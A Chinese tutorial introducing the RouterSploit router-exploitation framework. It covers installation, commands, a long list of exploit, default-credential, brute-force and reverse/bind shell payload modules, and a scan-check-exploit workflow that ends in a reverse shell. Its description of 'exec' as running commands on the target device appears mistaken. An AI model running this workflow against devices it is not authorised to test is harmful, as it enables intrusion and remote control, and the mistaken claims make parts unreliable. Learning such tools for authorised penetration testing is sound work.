routerSploit是一款专门针对路由器和嵌入式设备的漏洞测试工具，它提供了一套用于扫描、发现和利用路由器和嵌入式设备漏洞的功能。该工具使用Python编写，并集成了大量针对路由器和相关设备的漏洞利用模块，用户可以利用这些模块来进行渗透测试和安全评估。RouterSploit支持通过简单的命令行界面进行操作，并提供了丰富的功能，包括扫描、漏洞利用、暴力破解等，使用户能够快速、有效地评估目标设备的安全性。

RouterSploit的主要功能包括：

• 扫描功能：能够对目标路由器或嵌入式设备进行端口扫描、服务识别和漏洞扫描，帮助用户快速了解设备的安全状况。

• 漏洞利用：集成了大量针对路由器和嵌入式设备的漏洞利用模块，用户可以利用这些模块对已知的漏洞进行利用，以验证设备的安全性或进行渗透测试。

• 暴力破解功能：支持对路由器和相关设备的认证凭据进行暴力破解，帮助评估设备的认证机制是否安全。

• 模块化框架：具有模块化的设计结构，用户可以轻松添加新的漏洞利用模块或扩展现有功能，以适应不断变化的安全需求。

1.kali安装

1.1安装RouterSploit

默认情况下RouterSploit没有安装，在终端中输入routersploit命令后，系统自动提示安装，输入"Y"然后输入kali账号的密码即可自动进行安装。

也可以克隆安装：

git clone https://github.com/reverse-shell/routersploit

后面执行显示出错还需要安装一些需要的依赖包

pip install pycryptodome

1.2启动RouterSploit

在终端中输入routersploit即可开启RouterSploit框架。

2.RouterSploit主要命令

2.1基本命令

1.help命令

显示帮助信息

set：设置模块的参数，例如set RHOST 192.168.1.1设置目标主机。

2.show命令

info：显示模块的基本信息和描述。

options：显示模块的可配置选项和参数。

advanced：显示模块的高级选项和参数。

devices：显示已知设备的信息。

all：显示所有可用的模块。

encoders：显示可用的编码器。

creds：显示已经捕获的凭证。

exploits：显示可用的漏洞利用模块。

scanners：显示可用的扫描模块。

wordlists：显示可用的字典文件。

show all显示所有的

generic/upnp/ssdp_msearch

generic/bluetooth/btle_write

generic/bluetooth/btle_scan

generic/bluetooth/btle_enumerate

payloads/x86/reverse_tcp

payloads/x86/bind_tcp

payloads/perl/reverse_tcp

payloads/perl/bind_tcp

payloads/armle/reverse_tcp

payloads/armle/bind_tcp

payloads/php/reverse_tcp

payloads/php/bind_tcp

payloads/mipsle/reverse_tcp

payloads/mipsle/bind_tcp

payloads/mipsbe/reverse_tcp

payloads/mipsbe/bind_tcp

payloads/x64/reverse_tcp

payloads/x64/bind_tcp

payloads/cmd/netcat_reverse_tcp

payloads/cmd/perl_reverse_tcp

payloads/cmd/perl_bind_tcp

payloads/cmd/awk_bind_udp

payloads/cmd/awk_bind_tcp

payloads/cmd/python_reverse_udp

payloads/cmd/netcat_bind_tcp

payloads/cmd/php_bind_tcp

payloads/cmd/python_bind_udp

payloads/cmd/python_bind_tcp

payloads/cmd/python_reverse_tcp

payloads/cmd/awk_reverse_tcp

payloads/cmd/php_reverse_tcp

payloads/cmd/bash_reverse_tcp

payloads/python/reverse_udp

payloads/python/bind_udp

payloads/python/reverse_tcp

payloads/python/bind_tcp

scanners/autopwn

scanners/routers/router_scan

scanners/misc/misc_scan

scanners/cameras/camera_scan

encoders/php/hex

encoders/php/base64

encoders/python/hex

encoders/python/base64

creds/routers/netsys/telnet_default_creds

creds/routers/netsys/ftp_default_creds

creds/routers/netsys/ssh_default_creds

creds/routers/netcore/telnet_default_creds

creds/routers/netcore/ftp_default_creds

creds/routers/netcore/ssh_default_creds

creds/routers/ipfire/telnet_default_creds

creds/routers/ipfire/ftp_default_creds

creds/routers/ipfire/ssh_default_creds

creds/routers/technicolor/telnet_default_creds

creds/routers/technicolor/ftp_default_creds

creds/routers/technicolor/ssh_default_creds

creds/routers/3com/telnet_default_creds

creds/routers/3com/ftp_default_creds

creds/routers/3com/ssh_default_creds

creds/routers/2wire/telnet_default_creds

creds/routers/2wire/ftp_default_creds

creds/routers/2wire/ssh_default_creds

creds/routers/thomson/telnet_default_creds

creds/routers/thomson/ftp_default_creds

creds/routers/thomson/ssh_default_creds

creds/routers/huawei/telnet_default_creds

creds/routers/huawei/ftp_default_creds

creds/routers/huawei/ssh_default_creds

creds/routers/zte/telnet_default_creds

creds/routers/zte/ftp_default_creds

creds/routers/zte/ssh_default_creds

creds/routers/fortinet/telnet_default_creds

creds/routers/fortinet/ftp_default_creds

creds/routers/fortinet/ssh_default_creds

creds/routers/juniper/telnet_default_creds

creds/routers/juniper/ftp_default_creds

creds/routers/juniper/ssh_default_creds

creds/routers/pfsense/webinterface_http_form_default_creds

creds/routers/pfsense/ssh_default_creds

creds/routers/zyxel/telnet_default_creds

creds/routers/zyxel/ftp_default_creds

creds/routers/zyxel/ssh_default_creds

creds/routers/cisco/telnet_default_creds

creds/routers/cisco/ftp_default_creds

creds/routers/cisco/ssh_default_creds

creds/routers/ubiquiti/telnet_default_creds

creds/routers/ubiquiti/ftp_default_creds

creds/routers/ubiquiti/ssh_default_creds

creds/routers/asus/telnet_default_creds

creds/routers/asus/ftp_default_creds

creds/routers/asus/ssh_default_creds

creds/routers/movistar/telnet_default_creds

creds/routers/movistar/ftp_default_creds

creds/routers/movistar/ssh_default_creds

creds/routers/asmax/telnet_default_creds

creds/routers/asmax/ftp_default_creds

creds/routers/asmax/webinterface_http_auth_default_creds

creds/routers/asmax/ssh_default_creds

creds/routers/bhu/telnet_default_creds

creds/routers/bhu/ftp_default_creds

creds/routers/bhu/ssh_default_creds

creds/routers/belkin/telnet_default_creds

creds/routers/belkin/ftp_default_creds

creds/routers/belkin/ssh_default_creds

creds/routers/dlink/telnet_default_creds

creds/routers/dlink/ftp_default_creds

creds/routers/dlink/ssh_default_creds

creds/routers/comtrend/telnet_default_creds

creds/routers/comtrend/ftp_default_creds

creds/routers/comtrend/ssh_default_creds

creds/routers/tplink/telnet_default_creds

creds/routers/tplink/ftp_default_creds

creds/routers/tplink/ssh_default_creds

creds/routers/billion/telnet_default_creds

creds/routers/billion/ftp_default_creds

creds/routers/billion/ssh_default_creds

creds/routers/netgear/telnet_default_creds

creds/routers/netgear/ftp_default_creds

creds/routers/netgear/ssh_default_creds

creds/routers/mikrotik/telnet_default_creds

creds/routers/mikrotik/api_ros_default_creds

creds/routers/mikrotik/ftp_default_creds

creds/routers/mikrotik/ssh_default_creds

creds/routers/linksys/telnet_default_creds

creds/routers/linksys/ftp_default_creds

creds/routers/linksys/ssh_default_creds

creds/generic/snmp_bruteforce

creds/generic/ftp_default

creds/generic/telnet_default

creds/generic/http_basic_digest_default

creds/generic/ssh_bruteforce

creds/generic/ssh_default

creds/generic/http_basic_digest_bruteforce

creds/generic/telnet_bruteforce

creds/generic/ftp_bruteforce

creds/cameras/iqinvision/telnet_default_creds

creds/cameras/iqinvision/ftp_default_creds

creds/cameras/iqinvision/ssh_default_creds

creds/cameras/axis/telnet_default_creds

creds/cameras/axis/ftp_default_creds

creds/cameras/axis/webinterface_http_auth_default_creds

creds/cameras/axis/ssh_default_creds

creds/cameras/samsung/telnet_default_creds

creds/cameras/samsung/ftp_default_creds

creds/cameras/samsung/ssh_default_creds

creds/cameras/vacron/telnet_default_creds

creds/cameras/vacron/ftp_default_creds

creds/cameras/vacron/ssh_default_creds

creds/cameras/basler/telnet_default_creds

creds/cameras/basler/webinterface_http_form_default_creds

creds/cameras/basler/ftp_default_creds

creds/cameras/basler/ssh_default_creds

creds/cameras/siemens/telnet_default_creds

creds/cameras/siemens/ftp_default_creds

creds/cameras/siemens/ssh_default_creds

creds/cameras/arecont/telnet_default_creds

creds/cameras/arecont/ftp_default_creds

creds/cameras/arecont/ssh_default_creds

creds/cameras/avtech/telnet_default_creds

creds/cameras/avtech/ftp_default_creds

creds/cameras/avtech/ssh_default_creds

creds/cameras/hikvision/telnet_default_creds

creds/cameras/hikvision/ftp_default_creds

creds/cameras/hikvision/ssh_default_creds

creds/cameras/geovision/telnet_default_creds

creds/cameras/geovision/ftp_default_creds

creds/cameras/geovision/ssh_default_creds

creds/cameras/cisco/telnet_default_creds

creds/cameras/cisco/ftp_default_creds

creds/cameras/cisco/ssh_default_creds

creds/cameras/stardot/telnet_default_creds

creds/cameras/stardot/ftp_default_creds

creds/cameras/stardot/ssh_default_creds

creds/cameras/speco/telnet_default_creds

creds/cameras/speco/ftp_default_creds

creds/cameras/speco/ssh_default_creds

creds/cameras/brickcom/telnet_default_creds

creds/cameras/brickcom/ftp_default_creds

creds/cameras/brickcom/webinterface_http_auth_default_creds

creds/cameras/brickcom/ssh_default_creds

creds/cameras/mobotix/telnet_default_creds

creds/cameras/mobotix/ftp_default_creds

creds/cameras/mobotix/ssh_default_creds

creds/cameras/acti/telnet_default_creds

creds/cameras/acti/webinterface_http_form_default_creds

creds/cameras/acti/ftp_default_creds

creds/cameras/acti/ssh_default_creds

creds/cameras/videoiq/telnet_default_creds

creds/cameras/videoiq/ftp_default_creds

creds/cameras/videoiq/ssh_default_creds

creds/cameras/dlink/telnet_default_creds

creds/cameras/dlink/ftp_default_creds

creds/cameras/dlink/ssh_default_creds

creds/cameras/jvc/telnet_default_creds

creds/cameras/jvc/ftp_default_creds

creds/cameras/jvc/ssh_default_creds

creds/cameras/avigilon/telnet_default_creds

creds/cameras/avigilon/ftp_default_creds

creds/cameras/avigilon/ssh_default_creds

creds/cameras/canon/telnet_default_creds

creds/cameras/canon/ftp_default_creds

creds/cameras/canon/webinterface_http_auth_default_creds

creds/cameras/canon/ssh_default_creds

creds/cameras/grandstream/telnet_default_creds

creds/cameras/grandstream/ftp_default_creds

creds/cameras/grandstream/ssh_default_creds

creds/cameras/sentry360/telnet_default_creds

creds/cameras/sentry360/ftp_default_creds

creds/cameras/sentry360/ssh_default_creds

creds/cameras/american_dynamics/telnet_default_creds

creds/cameras/american_dynamics/ftp_default_creds

creds/cameras/american_dynamics/ssh_default_creds

creds/cameras/honeywell/telnet_default_creds

creds/cameras/honeywell/ftp_default_creds

creds/cameras/honeywell/ssh_default_creds

exploits/routers/netsys/multi_rce

exploits/routers/netcore/udp_53413_rce

exploits/routers/ipfire/ipfire_proxy_rce

exploits/routers/ipfire/ipfire_oinkcode_rce

exploits/routers/ipfire/ipfire_shellshock

exploits/routers/technicolor/tc7200_password_disclosure_v2

exploits/routers/technicolor/tc7200_password_disclosure

exploits/routers/technicolor/tg784_authbypass

exploits/routers/technicolor/dwg855_authbypass

exploits/routers/multi/misfortune_cookie

exploits/routers/multi/rom0

exploits/routers/multi/tcp_32764_rce

exploits/routers/multi/tcp_32764_info_disclosure

exploits/routers/multi/gpon_home_gateway_rce

exploits/routers/3com/officeconnect_rce

exploits/routers/3com/ap8760_password_disclosure

exploits/routers/3com/imc_path_traversal

exploits/routers/3com/officeconnect_info_disclosure

exploits/routers/3com/imc_info_disclosure

exploits/routers/2wire/gateway_auth_bypass

exploits/routers/2wire/4011g_5012nv_path_traversal

exploits/routers/thomson/twg849_info_disclosure

exploits/routers/thomson/twg850_password_disclosure

exploits/routers/huawei/e5331_mifi_info_disclosure

exploits/routers/huawei/hg530_hg520b_password_disclosure

exploits/routers/huawei/hg866_password_change

exploits/routers/huawei/hg520_info_disclosure

exploits/routers/zte/f460_f660_backdoor

exploits/routers/zte/zxv10_rce

exploits/routers/zte/zxhn_h108n_wifi_password_disclosure

exploits/routers/fortinet/fortigate_os_backdoor

exploits/routers/zyxel/zywall_usg_extract_hashes

exploits/routers/zyxel/p660hn_t_v2_rce

exploits/routers/zyxel/d1000_rce

exploits/routers/zyxel/p660hn_t_v1_rce

exploits/routers/zyxel/d1000_wifi_password_disclosure

exploits/routers/cisco/ucm_info_disclosure

exploits/routers/cisco/firepower_management60_path_traversal

exploits/routers/cisco/ucs_manager_rce

exploits/routers/cisco/secure_acs_bypass

exploits/routers/cisco/dpc2420_info_disclosure

exploits/routers/cisco/unified_multi_path_traversal

exploits/routers/cisco/ios_http_authorization_bypass

exploits/routers/cisco/firepower_management60_rce

exploits/routers/cisco/catalyst_2960_rocem

exploits/routers/ubiquiti/airos_6_x

exploits/routers/asus/asuswrt_lan_rce

exploits/routers/asus/rt_n16_password_disclosure

exploits/routers/asus/infosvr_backdoor_rce

exploits/routers/movistar/adsl_router_bhs_rta_path_traversal

exploits/routers/asmax/ar_804_gu_rce

exploits/routers/asmax/ar_1004g_password_disclosure

exploits/routers/bhu/bhu_urouter_rce

exploits/routers/belkin/n150_path_traversal

exploits/routers/belkin/g_plus_info_disclosure

exploits/routers/belkin/g_n150_password_disclosure

exploits/routers/belkin/play_max_prce

exploits/routers/belkin/auth_bypass

exploits/routers/belkin/n750_rce

exploits/routers/dlink/multi_hedwig_cgi_exec

exploits/routers/dlink/dir_645_password_disclosure

exploits/routers/dlink/dwl_3200ap_password_disclosure

exploits/routers/dlink/dsl_2740r_dns_change

exploits/routers/dlink/dir_300_645_815_upnp_rce

exploits/routers/dlink/dcs_930l_auth_rce

exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change

exploits/routers/dlink/dsl_2750b_rce

exploits/routers/dlink/multi_hnap_rce

exploits/routers/dlink/dwr_932_info_disclosure

exploits/routers/dlink/dvg_n5402sp_path_traversal

exploits/routers/dlink/dir_8xx_password_disclosure

exploits/routers/dlink/dwr_932b_backdoor

exploits/routers/dlink/dir_645_815_rce

exploits/routers/dlink/dsl_2640b_dns_change

exploits/routers/dlink/dsp_w110_rce

exploits/routers/dlink/dir_815_850l_rce

exploits/routers/dlink/dir_300_600_rce

exploits/routers/dlink/dir_300_320_600_615_info_disclosure

exploits/routers/dlink/dgs_1510_add_user

exploits/routers/dlink/dsl_2750b_info_disclosure

exploits/routers/dlink/dir_850l_creds_disclosure

exploits/routers/dlink/dir_825_path_traversal

exploits/routers/dlink/dir_300_320_615_auth_bypass

exploits/routers/dlink/dns_320l_327l_rce

exploits/routers/dlink/dsl_2730_2750_path_traversal

exploits/routers/comtrend/ct_5361t_password_disclosure

exploits/routers/tplink/wdr842nd_wdr842n_configure_disclosure

exploits/routers/tplink/wdr740nd_wdr740n_path_traversal

exploits/routers/tplink/wdr740nd_wdr740n_backdoor

exploits/routers/tplink/archer_c2_c20i_rce

exploits/routers/billion/billion_7700nr4_password_disclosure

exploits/routers/billion/billion_5200w_rce

exploits/routers/shuttle/915wm_dns_change

exploits/routers/netgear/jnr1010_path_traversal

exploits/routers/netgear/dgn2200_ping_cgi_rce

exploits/routers/netgear/multi_rce

exploits/routers/netgear/prosafe_rce

exploits/routers/netgear/dgn2200_dnslookup_cgi_rce

exploits/routers/netgear/r7000_r6400_rce

exploits/routers/netgear/multi_password_disclosure-2017-5521

exploits/routers/netgear/wnr500_612v3_jnr1010_2010_path_traversal

exploits/routers/netgear/n300_auth_bypass

exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure

exploits/routers/mikrotik/routeros_jailbreak

exploits/routers/linksys/wrt100_110_rce

exploits/routers/linksys/smartwifi_password_disclosure

exploits/routers/linksys/eseries_themoon_rce

exploits/routers/linksys/1500_2500_rce

exploits/routers/linksys/wap54gv3_rce

exploits/generic/ssh_auth_keys

exploits/generic/heartbleed

exploits/generic/shellshock

exploits/misc/asus/b1m_projector_rce

exploits/misc/wepresent/wipg1000_rce

exploits/misc/miele/pg8528_path_traversal

exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal

exploits/cameras/multi/netwave_ip_camera_information_disclosure

exploits/cameras/multi/dvr_creds_disclosure

exploits/cameras/multi/P2P_wificam_credential_disclosure

exploits/cameras/multi/P2P_wificam_rce

exploits/cameras/siemens/cvms2025_credentials_disclosure

exploits/cameras/cisco/video_surv_path_traversal

exploits/cameras/jovision/jovision_credentials_disclosure

exploits/cameras/brickcom/users_cgi_creds_disclosure

exploits/cameras/brickcom/corp_network_cameras_conf_disclosure

exploits/cameras/mvpower/dvr_jaws_rce

exploits/cameras/dlink/dcs_930l_932l_auth_bypass

exploits/cameras/avigilon/videoiq_camera_path_traversal

exploits/cameras/xiongmai/uc_httpd_path_traversal

exploits/cameras/grandstream/gxv3611hd_ip_camera_sqli

exploits/cameras/grandstream/gxv3611hd_ip_camera_backdoor

exploits/cameras/honeywell/hicc_1100pt_password_disclosure

3.run

执行当前模块来利用目标设备。

4.use命令

use <module>：选择要使用的模块，例如漏洞利用模块、扫描模块等。例如use scanners/autopwn

5.执行指定的命令

exec <shell command> <args>：在shell中执行指定的命令，可以用于执行系统命令等。

在RouterSploit中，exec命令可以用于执行特定的系统命令。您可以使用exec命令来执行各种操作系统命令和工具，包括但不限于以下内容：

（1）执行系统命令

exec run ifconfig

这个例子会在目标设备上执行ifconfig命令，显示网络接口的配置信息。

（2）执行其他工具：

exec run nmap -sP 192.168.0.1/24

这个例子会在目标设备上执行nmap扫描命令，对指定网段进行主机存活性检测。

（3）执行自定义脚本

exec run /path/to/custom_script.sh arg1 arg2

这个例子会在目标设备上执行自定义的Shell脚本，并传入参数arg1和arg2。

6.search 搜索命令

search <search term>：搜索符合特定关键词的模块。

7.退出和返回

exit：退出RouterSploit工具。

back：返回上一级菜单。

2.2扫描结果中符号

RouterSploit扫描过程及结果中会有三个符号[+]、[-]、[*]，特定的含义如下：

[+] 表示存在漏洞：扫描结果表明目标系统存在一个或多个已知的安全漏洞。

[-] 表示漏洞不存在：扫描结果表明目标系统未发现任何已知的安全漏洞。

[*] 表示无法确定：扫描结果表明无法确定目标系统是否存在已知的安全漏洞，可能由于扫描条件不足或存在其他未知因素。

3.RouterSploit利用流程

3.1RouterSploit扫描路由器漏洞

1.确认路由器地址

tracert www.sina.com.cn

第一个结果就是本地路由器地址。

3.2.扫描路由器

use scanners/autopwn

show options

set RHOST 192.168.1.1

run

3.3.对漏洞进行检查

use exploits/routers/3com/officeconnect_rce

set target 192.168.31.1

check

3.4.漏洞利用

1.配置playload

可以使用的playload列表（show all命令获取），网上很多文章通过show playloads命令来获取，kali环境执行未发现，有可能是python版本有。

payloads/x86/reverse_tcp

payloads/x86/bind_tcp

payloads/perl/reverse_tcp

payloads/perl/bind_tcp

payloads/armle/reverse_tcp

payloads/armle/bind_tcp

payloads/php/reverse_tcp

payloads/php/bind_tcp

payloads/mipsle/reverse_tcp

payloads/mipsle/bind_tcp

payloads/mipsbe/reverse_tcp

payloads/mipsbe/bind_tcp

payloads/x64/reverse_tcp

payloads/x64/bind_tcp

payloads/cmd/netcat_reverse_tcp

payloads/cmd/perl_reverse_tcp

payloads/cmd/perl_bind_tcp

payloads/cmd/awk_bind_udp

payloads/cmd/awk_bind_tcp

payloads/cmd/python_reverse_udp

payloads/cmd/netcat_bind_tcp

payloads/cmd/php_bind_tcp

payloads/cmd/python_bind_udp

payloads/cmd/python_bind_tcp

payloads/cmd/python_reverse_tcp

payloads/cmd/awk_reverse_tcp

payloads/cmd/php_reverse_tcp

payloads/cmd/bash_reverse_tcp

payloads/python/reverse_udp

payloads/python/bind_udp

payloads/python/reverse_tcp

payloads/python/bind_tcp

（1）选择对应的payload

use payloads/x64/reverse_tcp

（2）查看配置

show options

（3）设置payload

set lhost [你的ip]

（4）再次查看配置

show options

（5）开始攻击

run

如果存在可利用的漏洞则反弹shell

原文始发于微信公众号（小兵搞安全）：路由器漏洞测试工具routersploit入门